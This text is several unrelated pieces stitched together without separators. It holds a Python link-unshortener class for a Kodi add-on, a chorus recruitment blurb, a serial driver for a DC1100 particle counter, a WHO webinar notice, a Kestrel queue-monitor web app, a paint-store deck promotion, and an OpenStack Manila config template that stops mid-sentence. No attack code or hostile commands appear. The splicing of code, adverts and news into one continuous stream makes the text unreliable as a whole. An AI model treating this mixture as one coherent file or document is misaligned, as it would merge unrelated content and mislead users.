# -*- coding: utf-8 -*- #--------------------------------------------------------------------- ''' Created on 02 Jan 2016 @author: Seko @summary: Class for unshorten link ''' #--------------------------------------------------------------------- # ____________________ I M P O R T ____________________ import re import urllib import urllib2 import copy import traceback import cookielib import time import json import xbmcgui import constant import webUtil from urlparse import urlsplit # ____________________ C L A S S ____________________ class UnshortenUrl(object): PATTERN_VIIDME = r'viid\.me' PATTERN_CLLKME = r'cllkme\.com' PATTERN_SHST = r'sh\.st' PATTERN_SHST_WITH_FREEZE = r'http://sh.st/freeze/' PATTERN_DPSTREAM = r'https://www.dpstream.net/external_link/' def __init__(self): """ Constructor """ self.HEADER_CFG = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 'Accept-Encoding': 'none', 'Accept-Language': 'en-US,en;q=0.8', 'Connection': 'keep-alive'} self.cookiejar = cookielib.CookieJar() self.urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar),webUtil.SmartRedirectHandler()) def unshortUrl(self,url): """ Method to unshort url @param url: the url to unshort @return the final url """ newUrl = self._unshort(url) while url != newUrl: url = newUrl newUrl = self._unshort(url) return newUrl def _unshort(self,url): """ Method to unshort url @param url: the url to unshort @return the final url """ domain = urlsplit(url).netloc if not domain: return url if re.search(self.PATTERN_VIIDME,url): return self._unshortshst(url,'viid.me') if re.search(self.PATTERN_CLLKME,url): return self._unshortshst(url,'cllkme.com') elif re.search(self.PATTERN_SHST_WITH_FREEZE,url): return self._unshortshst(url[20:]) elif re.search(self.PATTERN_SHST,url): return self._unshortshst(url) elif re.search(self.PATTERN_DPSTREAM,url): return self._unshortdpstream(url) else: return url def _unshortshst(self,url,host='sh.st'): """ Method to unshort Viid.me url @param url: the url to unshort @return the final url """ if url.endswith('/'): url = url[:-1] request = urllib2.Request(url, headers=self.HEADER_CFG) response = None try: response = self.urlOpener.open(request) if response is not None and response.getcode() == 200: content = response.read() sessionPattern = re.compile('(.*)(sessionId: ")(.{1,50})(",)(.*)',re.DOTALL) match = sessionPattern.match(content) if match is not None: # __ Get adSessionId adSessionId = match.group(3) # __ Construct url urlEnd = 'http://'+host+'/shortest-url/end-adsession?' data1 = {'adSessionId':adSessionId,'callback':'c'} dataStr = urllib.urlencode(data1) urlEnd+=dataStr # ___ Define headers headers1 = copy.copy(self.HEADER_CFG) headers1["Host"] = host headers1["Referer"] = url # ___ Sleep 5 seconds currentSecond = 5 dp = xbmcgui.DialogProgress() dp.create(constant.__addon__.getLocalizedString(33057),str(currentSecond)+' secondes') while currentSecond > 0: currentSecond = currentSecond-1 dp.update((5-currentSecond)*20, str(currentSecond)+' secondes') time.sleep(1) dp.close() dp = None # ___ Request the final url requestEnd = urllib2.Request(urlEnd,headers=headers1) responseEnd = None try: responseEnd = self.urlOpener.open(requestEnd) except urllib2.HTTPError as e: responseEnd = e except: traceback.print_exc() if responseEnd is not None and responseEnd.getcode() == 200: # ___ Get the destination url contentEnd = responseEnd.read() jsonResult = json.loads(contentEnd[6:-2].decode('utf-8')) return jsonResult['destinationUrl'] except: traceback.print_exc() return url def _unshortdpstream(self,url): """ Method to unshort dpstream url """ if url.endswith('/'): url = url[:-1] print url request = urllib2.Request(url, headers=self.HEADER_CFG) response = None try: response = self.urlOpener.open(request) if response is not None and response.getcode() == 200: content = response.read() index = content.find('window.open') if index > 0: getUrlPattern = re.compile("(.*)(window.open\(\\\\')(.*)(\\\\',\\\\'_blank\\\\')(.*)",re.MULTILINE) match = getUrlPattern.match(content[index:]) if match is not None: return match.group(3) else: print content except: traceback.print_exc() return url
So . . . . Where do you like to do your singing? In front of others - We would love to have your voice with us. I’m sure we could both learn from one another. Alone -I like to sing alone, too, because no one is there to judge me. That’s how I feel when I sing with the Racing City Chorus. We have pure beginners with no musical experience to the very talented, but the nice thing is we all get better together. We even give you learning tracks with your part on one side and the other three parts in the other so you can balance it however you want and sing whenever you want. So, it’s fun. And none of the choices is any better or worse than any other because YOU CAN. I know of no other organization on the planet that offers you so many choices to whatever tickles your fancy than ours. The singing and friendship are such a change of pace from the daily grind. Come and check it out for a night and see how much fun it really is. We meet on Tuesday nights at the Living Waters Church, 4330 RT. 50, Wilton NY 12866 at 7:30. I would be happy to share a ride with you and pick you up. No pressure – just fun.
''' uvscada Copyright 2012 John McMaster <JohnDMcMaster@gmail.com> Licensed under the terms of the LGPL V3 or later, see COPYING for details ''' ''' I suspect all DC1100 units have the PC interface internally and just aren't brought outside Not sure how hard that is to do yourself though Also the manual hints that there is no internal difference between the pro and regular units The only difference is the calibration ''' import serial #import uvscada.serial import re ''' Small particles are displayed on the left Large particles are didplayed on the right Regular Small: Detection limit of 1 micron (um) Large: ~5 um Pro Small: 0.5 um Large: 2.5 um Values are scaled to represent concentration of particles in 0.01 cubic foot of sampled air Since this object only reports density it doesn't matter what these actual size values are ''' class Measurement: # Qualities VERY_POOR = 1 POOR = 2 FAIR = 3 GOOD = 4 VERY_GOOD = 5 EXCELLENT = 6 @staticmethod def quality_str(q): vals = ['VERY_POOR', 'POOR','FAIR','GOOD','VERY_GOOD','EXCELLENT'] for v in vals: if q == eval('Measurement.' + v): return v return None def __init__(self, small, large): self.small = small self.large = large def small_cpf(self): return self.small * self.cpf_conversion() def large_cpf(self): return self.large * self.cpf_conversion() def cpf_conversion(self): # Convert particles / (0.01 ft**3) to particles / ft**3 # (as used in FED-STD-209E) return 1 / 0.01 def small_cpm(self): return self.small * self.cpm_conversion() def large_cpm(self): return self.large * self.cpm_conversion() def cpm_conversion(self): # Convert particles / (0.01 ft**3) to particles / m**3 # 3531.466672149 return 1 / (0.01 * ((12.0 * 25.4 / 1000.0)**3)) def valid(self): # Some arbitrary high limits to detect a bad data parse if self.small > 100000 or self.small < 0: return False if self.large > 100000 or self.large < 0: return False # I'm not sure if this is actually true return self.small > self.large @staticmethod def parse(s): # Reading should be # 1231,422 parsed = re.match('([0-9]+)[,]([0-9]+)', s) if not parsed: return None return Measurement(int(parsed.group(1)), int(parsed.group(2))) class DC1100: def __init__(self, device): #if device is None: # device = uvscada.serial.get_device() self.device = device self.serial = serial.Serial(self.device, 9600, timeout=1) self.last_meas = None # Start out # spike # and then drop back self.test_meas = [] #self.test_meas = [(100, 10), (100, 10), (100, 10), (100, 10), (1000, 100), (1000, 100), (1000, 100), (100, 10), (100, 10), (100, 10), (100, 10), (100, 10)] # Don't return until a measurement is availible def wait_meas(self, require_valid = False): if len(self.test_meas) > 0: m = Measurement(*self.test_meas[0]) self.test_meas = self.test_meas[1:] self.last_meas = m return m while True: m = self.meas() if m and ((not require_valid) or m.valid()): return m # One Measurement per minute def meas(self): # Read until newline s = '' while True: c = self.serial.read() if c == '\n': break s += c self.last_meas = Measurement.parse(s) return self.last_meas def quality(self): ''' manual page 12 definition Although manual does not say these are small particle counts the back of the unit does ''' if self.last_meas == None: return None return self.meas_quality(self.last_meas) def quality_str(self): return Measurement.quality_str(self.quality()) def meas_quality(self, meas): ''' manual page 12 definition Although manual does not say these are small particle counts the back of the unit does ''' small = meas.small if small >= 1000: return Measurement.VERY_POOR elif small >= 350: return Measurement.POOR elif small >= 100: return Measurement.FAIR elif small >= 50: return Measurement.GOOD elif small >= 25: return Measurement.VERY_GOOD elif small >= 0: return Measurement.EXCELLENT else: raise Exception('Malformed measurement') class DC1100Pro(DC1100): def __init__(self, dev): DC1100.__init__(self, dev) def meas_quality(self, meas): small = meas.small if small >= 3000: return Measurement.VERY_POOR elif small >= 1050: return Measurement.POOR elif small >= 300: return Measurement.FAIR elif small >= 150: return Measurement.GOOD # 100 would be barely passing class 10k cleanroom elif small >= 75: return Measurement.VERY_GOOD elif small >= 0: return Measurement.EXCELLENT else: raise Exception('Malformed measurement')
The World Health Organisation has launched a series of live streamed panels exploring refugee and migrant health and well-being. The first webinar, was titled “True stories: effective advocacy for health and migration”, and focused on the importance of responsible, meaningful and compelling communications efforts to evoke positive change for migrants, refugees and host communities. This live session included leading experts in the diverse fields of medicine, arts, anthropology and museum education. The session was moderated by Salford University Science Communication Lecturer, Dr Erinma Ochu. It was organised by Santino Severoni, WHO, Coordinator, Regional Office for Europe Coordinator health and migration; Jozef, Bartovic, Technical Officer (Migration and Health), WHO Regional Office for Europe and Nils Fietje, WHO, Research Officer, WHO Regional Office for Europe. The online audience posted questions live via Slido for the panel to respond to. Find out more about the session here. The next webinar focuses on Mental Health and will be on 5th September 2017.
import logging.config import local_settings; logging.config.fileConfig(local_settings.logging_config) import dream import kestrel_actions import util App = dream.App() @App.expose('/') def home(request): return dream.Response(body=util.template('index.html'), content_type='text/html') @App.expose('/ajax/action.json') def ajax_action(request): callback = request.params['callback'] if 'callback' in request.params else None action = request.params['action'] if 'action' in request.params else None server_queue = request.params.getall('server') if 'server' in request.params else [] data = {} status = 200 if len(server_queue) == 0: data['error'] = 'Missing server or queue name' status = 500 elif action in ['flush', 'delete', 'peek', 'flush_all', 'reload', 'shutdown']: actions = [] for _sq in server_queue: (server, queue) = _sq.split(',', 1) if _sq.count(',') else (_sq, None) if action in ['flush', 'delete', 'peek']: actions.append((server, [queue])) else: actions.append((server, [])) data['results'] = kestrel_actions.action(action, actions) else: data['error'] = 'Invalid action' status = 500 return dream.JSONResponse(callback=callback, body=data, status=status) @App.expose('/ajax/stats.json') def ajax_stats(request): callback = request.params['callback'] if 'callback' in request.params else None servers = request.params['servers'] if 'servers' in request.params else None qsort = request.params['qsort'] if 'qsort' in request.params else None qreverse = int(request.params['qreverse']) if 'qreverse' in request.params else 0 qfilter = request.params['qfilter'] if 'qfilter' in request.params else None response = {} if servers: server_stats = dict([(server, None) for server in servers.split(',')]) queue_stats = [] stats_response = kestrel_actions.stats(server_stats.iterkeys()) if stats_response is not None: for server, _data in stats_response.iteritems(): server_stats[server] = _data['server'] queue_stats.extend([ dict(server=server, queue=queue, **qstats) for queue, qstats in _data['queues'].iteritems() if util.queue_filter(qfilter, queue, qstats) ]) response['servers'] = [ {'server': server, 'stats': _stats} for server, _stats in server_stats.iteritems() ] response['servers'].sort(key=util.QUEUE_SORT['server']) response['queues'] = queue_stats response['queues'].sort(key=util.QUEUE_SORT['server']) response['queues'].sort(key=util.QUEUE_SORT[qsort] if qsort in util.QUEUE_SORT else util.QUEUE_SORT['name'], reverse=qreverse) return dream.JSONResponse(callback=callback, body=response) @App.expose('/ajax/config.json') def templates(request): callback = request.params['callback'] if 'callback' in request.params else None return dream.JSONResponse(callback=callback, body={ 'servers': [{'server': server} for server in local_settings.servers], 'templates': { 'content': util.template('content.html'), 'servers': util.template('servers.html'), 'queues': util.template('queues.html'), } }) @App.expose('/static/<filepath:.*>') def static(request, filepath): body = '' content_type = 'test/plain' try: body = util.static(filepath) if filepath.endswith('.css'): content_type = 'text/css' elif filepath.endswith('.js'): content_type = 'text/javascript' elif filepath.endswith('.html'): content_type = 'text/html' elif filepath.endswith('.png'): content_type = 'image/png' except: pass return dream.Response(body=body, content_type=content_type)
There’s no fail like a BBQ fail and the most epic BBQ fail is an unkept deck. Luckily, Inspirations Paint will help you Unfail Your Deck. Right now, for every $125 spent on deck products (oils, stains, cleaning products & accessories at participating stores) get a $25 voucher for your next project. Hurry, offer ends 24 November 2018 or while voucher stocks last. Click here to find your nearest store. Offer is applicable from 29 October and ends 24 November 2018 or while voucher stocks last. Full Terms & Conditions: Retail customers only. Excludes trade products, trade and account customers. Instantly get 1 x $25 project voucher for every $125 spent on deck products (oils, stains, cleaning products & accessories) in one retail transaction at participating stores. Deck products include: decking oils, decking stains, deck cleaner and deck accessories such as; applicators, poles, socks, buckets, brushes and pads. The $125 qualifying amount is after Paint Club discount is applied, if the customer is a member of Inspirations Paint’s loyalty program, Paint Club. Otherwise the $125 qualifier is at RRP. Vouchers expire 28 February 2019. Voucher is for the customers’ “next project” and cannot be redeemed on the same purchase that earned the voucher. Vouchers are not redeemable for cash and must be used in one transaction with no change given for unspent funds. The $25 voucher is valid for redemption on any products at a retail price point (RRP or Paint Club). Vouchers can only be used once and must be surrendered to store staff at time of payment.
conf_manila_conf = """[DEFAULT] default_share_type = default_share_type rootwrap_config = /etc/manila/rootwrap.conf auth_strategy = keystone my_ip = {{ my_ip }} # # From oslo.messaging # # Size of RPC connection pool. (integer value) # Deprecated group/name - [DEFAULT]/rpc_conn_pool_size #rpc_conn_pool_size = 30 # ZeroMQ bind address. Should be a wildcard (*), an ethernet # interface, or IP. The "host" option should point or resolve to this # address. (string value) #rpc_zmq_bind_address = * # MatchMaker driver. (string value) # Allowed values: redis, dummy #rpc_zmq_matchmaker = redis # Type of concurrency used. Either "native" or "eventlet" (string # value) #rpc_zmq_concurrency = eventlet # Number of ZeroMQ contexts, defaults to 1. (integer value) #rpc_zmq_contexts = 1 # Maximum number of ingress messages to locally buffer per topic. # Default is unlimited. (integer value) #rpc_zmq_topic_backlog = <None> # Directory for holding IPC sockets. (string value) #rpc_zmq_ipc_dir = /var/run/openstack # Name of this node. Must be a valid hostname, FQDN, or IP address. # Must match "host" option, if running Nova. (string value) #rpc_zmq_host = localhost # Seconds to wait before a cast expires (TTL). The default value of -1 # specifies an infinite linger period. The value of 0 specifies no # linger period. Pending messages shall be discarded immediately when # the socket is closed. Only supported by impl_zmq. (integer value) #rpc_cast_timeout = -1 # The default number of seconds that poll should wait. Poll raises # timeout exception when timeout expired. (integer value) #rpc_poll_timeout = 1 # Expiration timeout in seconds of a name service record about # existing target ( < 0 means no timeout). (integer value) #zmq_target_expire = 120 # Use PUB/SUB pattern for fanout methods. PUB/SUB always uses proxy. # (boolean value) #use_pub_sub = true # Minimal port number for random ports range. (port value) # Minimum value: 0 # Maximum value: 65535 #rpc_zmq_min_port = 49152 # Maximal port number for random ports range. (integer value) # Minimum value: 1 # Maximum value: 65536 #rpc_zmq_max_port = 65536 # Number of retries to find free port number before fail with # ZMQBindError. (integer value) #rpc_zmq_bind_port_retries = 100 # Size of executor thread pool. (integer value) # Deprecated group/name - [DEFAULT]/rpc_thread_pool_size #executor_thread_pool_size = 64 # Seconds to wait for a response from a call. (integer value) #rpc_response_timeout = 60 # A URL representing the messaging driver to use and its full # configuration. If not set, we fall back to the rpc_backend option # and driver specific configuration. (string value) #transport_url = <None> # The messaging driver to use, defaults to rabbit. Other drivers # include amqp and zmq. (string value) rpc_backend = rabbit # The default exchange under which topics are scoped. May be # overridden by an exchange name specified in the transport_url # option. (string value) #control_exchange = openstack [cors] # # From oslo.middleware.cors # # Indicate whether this resource may be shared with the domain # received in the requests "origin" header. (list value) #allowed_origin = <None> # Indicate that the actual request can include user credentials # (boolean value) #allow_credentials = true # Indicate which headers are safe to expose to the API. Defaults to # HTTP Simple Headers. (list value) #expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma # Maximum cache age of CORS preflight requests. (integer value) #max_age = 3600 # Indicate which methods can be used during the actual request. (list # value) #allow_methods = GET,POST,PUT,DELETE,OPTIONS # Indicate which header field names may be used during the actual # request. (list value) #allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma [cors.subdomain] # # From oslo.middleware.cors # # Indicate whether this resource may be shared with the domain # received in the requests "origin" header. (list value) #allowed_origin = <None> # Indicate that the actual request can include user credentials # (boolean value) #allow_credentials = true # Indicate which headers are safe to expose to the API. Defaults to # HTTP Simple Headers. (list value) #expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma # Maximum cache age of CORS preflight requests. (integer value) #max_age = 3600 # Indicate which methods can be used during the actual request. (list # value) #allow_methods = GET,POST,PUT,DELETE,OPTIONS # Indicate which header field names may be used during the actual # request. (list value) #allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma [database] # # From oslo.db # # The file name to use with SQLite. (string value) # Deprecated group/name - [DEFAULT]/sqlite_db #sqlite_db = oslo.sqlite # If True, SQLite uses synchronous mode. (boolean value) # Deprecated group/name - [DEFAULT]/sqlite_synchronous #sqlite_synchronous = true # The back end to use for the database. (string value) # Deprecated group/name - [DEFAULT]/db_backend #backend = sqlalchemy # The SQLAlchemy connection string to use to connect to the database. # (string value) # Deprecated group/name - [DEFAULT]/sql_connection # Deprecated group/name - [DATABASE]/sql_connection # Deprecated group/name - [sql]/connection connection = {{ connection }} # The SQLAlchemy connection string to use to connect to the slave # database. (string value) #slave_connection = <None> # The SQL mode to be used for MySQL sessions. This option, including # the default, overrides any server-set SQL mode. To use whatever SQL # mode is set by the server configuration, set this to no value. # Example: mysql_sql_mode= (string value) #mysql_sql_mode = TRADITIONAL # Timeout before idle SQL connections are reaped. (integer value) # Deprecated group/name - [DEFAULT]/sql_idle_timeout # Deprecated group/name - [DATABASE]/sql_idle_timeout # Deprecated group/name - [sql]/idle_timeout #idle_timeout = 3600 # Minimum number of SQL connections to keep open in a pool. (integer # value) # Deprecated group/name - [DEFAULT]/sql_min_pool_size # Deprecated group/name - [DATABASE]/sql_min_pool_size #min_pool_size = 1 # Maximum number of SQL connections to keep open in a pool. (integer # value) # Deprecated group/name - [DEFAULT]/sql_max_pool_size # Deprecated group/name - [DATABASE]/sql_max_pool_size #max_pool_size = <None> # Maximum number of database connection retries during startup. Set to # -1 to specify an infinite retry count. (integer value) # Deprecated group/name - [DEFAULT]/sql_max_retries # Deprecated group/name - [DATABASE]/sql_max_retries #max_retries = 10 # Interval between retries of opening a SQL connection. (integer # value) # Deprecated group/name - [DEFAULT]/sql_retry_interval # Deprecated group/name - [DATABASE]/reconnect_interval #retry_interval = 10 # If set, use this value for max_overflow with SQLAlchemy. (integer # value) # Deprecated group/name - [DEFAULT]/sql_max_overflow # Deprecated group/name - [DATABASE]/sqlalchemy_max_overflow #max_overflow = 50 # Verbosity of SQL debugging information: 0=None, 100=Everything. # (integer value) # Deprecated group/name - [DEFAULT]/sql_connection_debug #connection_debug = 0 # Add Python stack traces to SQL as comment strings. (boolean value) # Deprecated group/name - [DEFAULT]/sql_connection_trace #connection_trace = false # If set, use this value for pool_timeout with SQLAlchemy. (integer # value) # Deprecated group/name - [DATABASE]/sqlalchemy_pool_timeout #pool_timeout = <None> # Enable the experimental use of database reconnect on connection # lost. (boolean value) #use_db_reconnect = false # Seconds between retries of a database transaction. (integer value) #db_retry_interval = 1 # If True, increases the interval between retries of a database # operation up to db_max_retry_interval. (boolean value) #db_inc_retry_interval = true # If db_inc_retry_interval is set, the maximum seconds between retries # of a database operation. (integer value) #db_max_retry_interval = 10 # Maximum retries in case of connection error or deadlock error before # error is raised. Set to -1 to specify an infinite retry count. # (integer value) #db_max_retries = 20 # # From oslo.db.concurrency # # Enable the experimental use of thread pooling for all DB API calls # (boolean value) # Deprecated group/name - [DEFAULT]/dbapi_use_tpool #use_tpool = false [keystone_authtoken] # # From keystonemiddleware.auth_token # # Complete public Identity API endpoint. (string value) auth_uri = {{ auth_uri }} auth_url = {{ auth_url }} # API version of the admin Identity API endpoint. (string value) #auth_version = <None> # Do not handle authorization requests within the middleware, but # delegate the authorization decision to downstream WSGI components. # (boolean value) #delay_auth_decision = false # Request timeout value for communicating with Identity API server. # (integer value) #http_connect_timeout = <None> # How many times are we trying to reconnect when communicating with # Identity API Server. (integer value) #http_request_max_retries = 3 # Env key for the swift cache. (string value) #cache = <None> # Required if identity server requires client certificate (string # value) #certfile = <None> # Required if identity server requires client certificate (string # value) #keyfile = <None> # A PEM encoded Certificate Authority to use when verifying HTTPs # connections. Defaults to system CAs. (string value) #cafile = <None> # Verify HTTPS connections. (boolean value) #insecure = false # The region in which the identity server can be found. (string value) #region_name = <None> # Directory used to cache files related to PKI tokens. (string value) #signing_dir = <None> # Optionally specify a list of memcached server(s) to use for caching. # If left undefined, tokens will instead be cached in-process. (list # value) # Deprecated group/name - [DEFAULT]/memcache_servers memcached_servers = {{ memcached_servers }} # In order to prevent excessive effort spent validating tokens, the # middleware caches previously-seen tokens for a configurable duration # (in seconds). Set to -1 to disable caching completely. (integer # value) #token_cache_time = 300 # Determines the frequency at which the list of revoked tokens is # retrieved from the Identity service (in seconds). A high number of # revocation events combined with a low cache duration may # significantly reduce performance. (integer value) #revocation_cache_time = 10 # (Optional) If defined, indicate whether token data should be # authenticated or authenticated and encrypted. If MAC, token data is # authenticated (with HMAC) in the cache. If ENCRYPT, token data is # encrypted and authenticated in the cache. If the value is not one of # these options or empty, auth_token will raise an exception on # initialization. (string value) # Allowed values: None, MAC, ENCRYPT #memcache_security_strategy = None # (Optional, mandatory if memcache_security_strategy is defined) This # string is used for key derivation. (string value) #memcache_secret_key = <None> # (Optional) Number of seconds memcached server is considered dead # before it is tried again. (integer value) #memcache_pool_dead_retry = 300 # (Optional) Maximum total number of open connections to every # memcached server. (integer value) #memcache_pool_maxsize = 10 # (Optional) Socket timeout in seconds for communicating with a # memcached server. (integer value) #memcache_pool_socket_timeout = 3 # (Optional) Number of seconds a connection to memcached is held # unused in the pool before it is closed. (integer value) #memcache_pool_unused_timeout = 60 # (Optional) Number of seconds that an operation will wait to get a # memcached client connection from the pool. (integer value) #memcache_pool_conn_get_timeout = 10 # (Optional) Use the advanced (eventlet safe) memcached client pool. # The advanced pool will only work under python 2.x. (boolean value) #memcache_use_advanced_pool = false # (Optional) Indicate whether to set the X-Service-Catalog header. If # False, middleware will not ask for service catalog on token # validation and will not set the X-Service-Catalog header. (boolean # value) #include_service_catalog = true # Used to control the use and type of token binding. Can be set to: # "disabled" to not check token binding. "permissive" (default) to # validate binding information if the bind type is of a form known to # the server and ignore it if not. "strict" like "permissive" but if # the bind type is unknown the token will be rejected. "required" any # form of token binding is needed to be allowed. Finally the name of a # binding method that must be present in tokens. (string value) #enforce_token_bind = permissive # If true, the revocation list will be checked for cached tokens. This # requires that PKI tokens are configured on the identity server. # (boolean value) #check_revocations_for_cached = false # Hash algorithms to use for hashing PKI tokens. This may be a single # algorithm or multiple. The algorithms are those supported by Python # standard hashlib.new(). The hashes will be tried in the order given, # so put the preferred one first for performance. The result of the # first hash will be stored in the cache. This will typically be set # to multiple values only while migrating from a less secure algorithm # to a more secure one. Once all the old tokens are expired this # option should be set to a single value for better performance. (list # value) #hash_algorithms = md5 # Prefix to prepend at the beginning of the path. Deprecated, use # identity_uri. (string value) #auth_admin_prefix = # Host providing the admin Identity API endpoint. Deprecated, use # identity_uri. (string value) #auth_host = 127.0.0.1 # Port of the admin Identity API endpoint. Deprecated, use # identity_uri. (integer value) #auth_port = 35357 # Protocol of the admin Identity API endpoint. Deprecated, use # identity_uri. (string value) # Allowed values: http, https #auth_protocol = https # Complete admin Identity API endpoint. This should specify the # unversioned root endpoint e.g. https://localhost:35357/ (string # value) #identity_uri = <None> # This option is deprecated and may be removed in a future release. # Single shared secret with the Keystone configuration used for # bootstrapping a Keystone installation, or otherwise bypassing the # normal authentication process. This option should not be used, use # `admin_user` and `admin_password` instead. (string value) #admin_token = <None> # Service username. (string value) #admin_user = <None> # Service user password. (string value) #admin_password = <None> # Service tenant name. (string value) #admin_tenant_name = admin # Authentication type to load (unknown value) # Deprecated group/name - [DEFAULT]/auth_plugin auth_type = password # Config Section from which to load plugin specific options (unknown # value) #auth_section = <None> project_domain_name = default user_domain_name = default project_name = service username = manila password = {{ manila_pass }} [matchmaker_redis] # # From oslo.messaging # # Host to locate redis. (string value) #host = 127.0.0.1 # Use this port to connect to redis host. (port value) # Minimum value: 0 # Maximum value: 65535 #port = 6379 # Password for Redis server (optional). (string value) #password = # List of Redis Sentinel hosts (fault tolerance mode) e.g. # [host:port, host1:port ... ] (list value) #sentinel_hosts = # Redis replica set name. (string value) #sentinel_group_name = oslo-messaging-zeromq # Time in ms to wait between connection attempts. (integer value) #wait_timeout = 500 # Time in ms to wait before the transaction is killed. (integer value) #check_timeout = 20000 # Timeout in ms on blocking socket operations (integer value) #socket_timeout = 1000 [oslo_messaging_amqp] # # From oslo.messaging # # address prefix used when sending to a specific server (string value) # Deprecated group/name - [amqp1]/server_request_prefix #server_request_prefix = exclusive # address prefix used when broadcasting to all servers (string value) # Deprecated group/name - [amqp1]/broadcast_prefix #broadcast_prefix = broadcast # address prefix when sending to any server in group (string value) # Deprecated group/name - [amqp1]/group_request_prefix #group_request_prefix = unicast # Name for the AMQP container (string value) # Deprecated group/name - [amqp1]/container_name #container_name = <None> # Timeout for inactive connections (in seconds) (integer value) # Deprecated group/name - [amqp1]/idle_timeout #idle_timeout = 0 # Debug: dump AMQP frames to stdout (boolean value) # Deprecated group/name - [amqp1]/trace #trace = false # CA certificate PEM file to verify server certificate (string value) # Deprecated group/name - [amqp1]/ssl_ca_file #ssl_ca_file = # Identifying certificate PEM file to present to clients (string # value) # Deprecated group/name - [amqp1]/ssl_cert_file #ssl_cert_file = # Private key PEM file used to sign cert_file certificate (string # value) # Deprecated group/name - [amqp1]/ssl_key_file #ssl_key_file = # Password for decrypting ssl_key_file (if encrypted) (string value) # Deprecated group/name - [amqp1]/ssl_key_password #ssl_key_password = <None> # Accept clients using either SSL or plain TCP (boolean value) # Deprecated group/name - [amqp1]/allow_insecure_clients #allow_insecure_clients = false # Space separated list of acceptable SASL mechanisms (string value) # Deprecated group/name - [amqp1]/sasl_mechanisms #sasl_mechanisms = # Path to directory that contains the SASL configuration (string # value) # Deprecated group/name - [amqp1]/sasl_config_dir #sasl_config_dir = # Name of configuration file (without .conf suffix) (string value) # Deprecated group/name - [amqp1]/sasl_config_name #sasl_config_name = # User name for message broker authentication (string value) # Deprecated group/name - [amqp1]/username #username = # Password for message broker authentication (string value) # Deprecated group/name - [amqp1]/password #password = [oslo_messaging_notifications] # # From oslo.messaging # # The Drivers(s) to handle sending notifications. Possible values are # messaging, messagingv2, routing, log, test, noop (multi valued) # Deprecated group/name - [DEFAULT]/notification_driver #driver = # A URL representing the messaging driver to use for notifications. If # not set, we fall back to the same configuration used for RPC. # (string value) # Deprecated group/name - [DEFAULT]/notification_transport_url #transport_url = <None> # AMQP topic used for OpenStack notifications. (list value) # Deprecated group/name - [rpc_notifier2]/topics # Deprecated group/name - [DEFAULT]/notification_topics #topics = notifications [oslo_messaging_rabbit] # # From oslo.messaging # # Use durable queues in AMQP. (boolean value) # Deprecated group/name - [DEFAULT]/amqp_durable_queues # Deprecated group/name - [DEFAULT]/rabbit_durable_queues #amqp_durable_queues = false # Auto-delete queues in AMQP. (boolean value) # Deprecated group/name - [DEFAULT]/amqp_auto_delete #amqp_auto_delete = false # SSL version to use (valid only if SSL enabled). Valid values are # TLSv1 and SSLv23. SSLv2, SSLv3, TLSv1_1, and TLSv1_2 may be # available on some distributions. (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_version #kombu_ssl_version = # SSL key file (valid only if SSL enabled). (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_keyfile #kombu_ssl_keyfile = # SSL cert file (valid only if SSL enabled). (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_certfile #kombu_ssl_certfile = # SSL certification authority file (valid only if SSL enabled). # (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_ca_certs #kombu_ssl_ca_certs = # How long to wait before reconnecting in response to an AMQP consumer # cancel notification. (floating point value) # Deprecated group/name - [DEFAULT]/kombu_reconnect_delay #kombu_reconnect_delay = 1.0 # EXPERIMENTAL: Possible values are: gzip, bz2. If not set compression # will not be used. This option may notbe available in future # versions. (string value) #kombu_compression = <None> # How long to wait a missing client beforce abandoning to send it its # replies. This value should not be longer than rpc_response_timeout. # (integer value) # Deprecated group/name - [DEFAULT]/kombu_reconnect_timeout #kombu_missing_consumer_retry_timeout = 60 # Determines how the next RabbitMQ node is chosen in case the one we # are currently connected to becomes unavailable. Takes effect only if # more than one RabbitMQ node is provided in config. (string value) # Allowed values: round-robin, shuffle #kombu_failover_strategy = round-robin # The RabbitMQ broker address where a single node is used. (string # value) # Deprecated group/name - [DEFAULT]/rabbit_host #rabbit_host = localhost # The RabbitMQ broker port where a single node is used. (port value) # Minimum value: 0 # Maximum value: 65535 # Deprecated group/name - [DEFAULT]/rabbit_port #rabbit_port = 5672 # RabbitMQ HA cluster host:port pairs. (list value) # Deprecated group/name - [DEFAULT]/rabbit_hosts #rabbit_hosts = $rabbit_host:$rabbit_port rabbit_hosts = {{ rabbit_hosts }} # Connect over SSL for RabbitMQ. (boolean value) # Deprecated group/name - [DEFAULT]/rabbit_use_ssl #rabbit_use_ssl = false # The RabbitMQ userid. (string value) # Deprecated group/name - [DEFAULT]/rabbit_userid rabbit_userid = {{ rabbit_userid }} # The RabbitMQ password. (string value) # Deprecated group/name - [DEFAULT]/rabbit_password rabbit_password = {{ rabbit_password }} # The RabbitMQ login method. (string value) # Deprecated group/name - [DEFAULT]/rabbit_login_method #rabbit_login_method = AMQPLAIN # The RabbitMQ virtual host. (string value) # Deprecated group/name - [DEFAULT]/rabbit_virtual_host #rabbit_virtual_host = / # How frequently to retry connecting with RabbitMQ. (integer value) #rabbit_retry_interval = 1 # How long to backoff for between retries when connecting to RabbitMQ. # (integer value) # Deprecated group/name - [DEFAULT]/rabbit_retry_backoff #rabbit_retry_backoff = 2 # Maximum interval of RabbitMQ connection retries. Default is 30 # seconds. (integer value) #rabbit_interval_max = 30 # Maximum number of RabbitMQ connection retries. Default is 0 # (infinite retry count). (integer value) # Deprecated group/name - [DEFAULT]/rabbit_max_retries #rabbit_max_retries = 0 # Try to use HA queues in RabbitMQ (x-ha-policy: all). If you change # this option, you must wipe the RabbitMQ database. In RabbitMQ 3.0, # queue mirroring is no longer controlled by the x-ha-policy argument # when declaring a queue. If you just want to make sure that all # queues (except those with auto-generated names) are mirrored across # all nodes, run: "rabbitmqctl set_policy HA 